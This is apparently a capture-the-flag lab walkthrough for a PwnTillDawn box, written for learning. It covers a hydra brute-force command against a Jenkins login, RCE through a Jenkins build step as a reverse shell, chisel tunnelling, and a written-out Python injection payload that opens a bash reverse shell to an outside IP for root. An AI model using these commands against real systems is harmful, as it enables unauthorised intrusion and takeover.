This is a vulnerable VM from PwnTillDawn.
Box: Medium, Flags to acquire = 4
Let's start with a quick Nmap scan.
We can see 2 ports open. SSH and an Uknown port. Let's enumerate a bit more.
Port 30609, looks to be a web service due to the robots.txt entry, let's check it out.
We get a hint here for build links whatever that means. Let's visit the main web service. Here we are present with a Jenkins login portal.
After trying numerous public exploits and using Metasploit for Jenkins, none of the payloads would work, so back to the drawing board (Brute-Force time!)
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.150.150.38 -s 30609 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"
After a little while, we get a result.
Now we can log in!
Looking over the Jenkins application and visiting the asynchPeople page we get our first flag (http://10.150.150.38:30609/asynchPeople/)
Remembering our hint from earlier for build (robots.txt), it becomes apparent we need to use the build options to get onto the box.
Time to make a new task. Head over to http://10.150.150.38:30609/view/all/newJob (new Item)
Enter a project name and click the Freestyle project as the type, then click ok.
On the next page enter a description in the description box (whatever you like here), then scroll down to build (there’s that hint again!).
Click Add build Step (execute shell option as we are on a Linux box)
Then add your payload. I used a simple bash reverse shell here.
Click Save, then Build Now to fire the payload (don’t forget to start a Netcat listener!)
Boom!! We get our shell
Let's make it stable so Ctrl +c won’t kick us off the box, we can use python3 for this.
Shell Upgrade (STTY)
* python3 -c 'import pty;pty.spawn("/bin/bash")'
* Press Ctrl + z
* Enter: stty raw -echo;fg
* Enter: reset
* Enter: xterm
Tip: now export the terminal to support things like ctrl +l
* Enter: export TERM=xterm
Now we can grab FLAG70 at /var/lib/jenkins
Enum Round 2
With the first two flags, it's time to start the enum phase again.
Checking out the system shows an open port on localhost:8080
Using wget we can see the page and source code. Let's do that.
Here we can see the source code by using cat to see index.html, with a comment in the source for another FLAG. (this time in an image). We can download this with wget and send to our machine to see it.. Or we can use chisel (port forward/tunnel tool) to our machine for easy access.
Chisel (port forward)
We need to get chisel on the box we are attacking.
Chisel Download: https://github.com/jpillora/chisel
Basic user guide for tunneling: https://book.hacktricks.xyz/tunneling-and-port-forwarding
I used my own tool to transfer the files
I’ve added the binary in /usr/local/bin/simpserv. I have my most used tools and scripts saved in /opt/tools. This allows me to enter one command to transfer files across to the box.
cd /opt/tools && sudo simpserv
Now I can transfer with copy and paste for ease (your welcome to use whatever method you feel comfortable with)
Upload chisel to the attacking machine. Then start it up for a reverse proxy connection.
chisel server -p 8000 --reverseAttacking machine.
chisel client YOURIP:8000 R:8080:127.0.0.1:8080
If you have Burp Suite running change the first R:port to connect.
eg: chisel client YOURIP:8000 R:8081:127.0.0.1:8080
Now you can open your browser and connect to the internal site via the reverse proxy.
Now with the proxy setup, we can finally access FLAG.png (flag71)
Privilege Escalation (Root)
Looking at the webpage on localhost port 8080. We can see 2 boxes, which take in 2 numbers and adds them together.
Having no luck with basic web attacks I started to enum the box again. I discovered a file owned by root running in the processes. (/usr/bin/python /root/mycalc/untitled.py 127.0.0.1 8080)
This gives us a hint to the exploit path (python command injection). Not knowing this it was a quick google search that leads me to this article: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
Trying a few of the commands, I quickly gained a reverse shell.
Start another Netcat listener, I choose port 30609 as it's open already.
nc -lnvp 30906Box 1 on the website
__import__('os').system('bash -c "bash -i >& /dev/tcp/10.66.66.238/30609 0>&1"')#
Hit Calculate to get the reverse shell.
Now we can get the final flag as Root! (FLAG72)
Thanks!! I hope you enjoyed the walkthrough.
Keep hacking the world! (Ethically!!)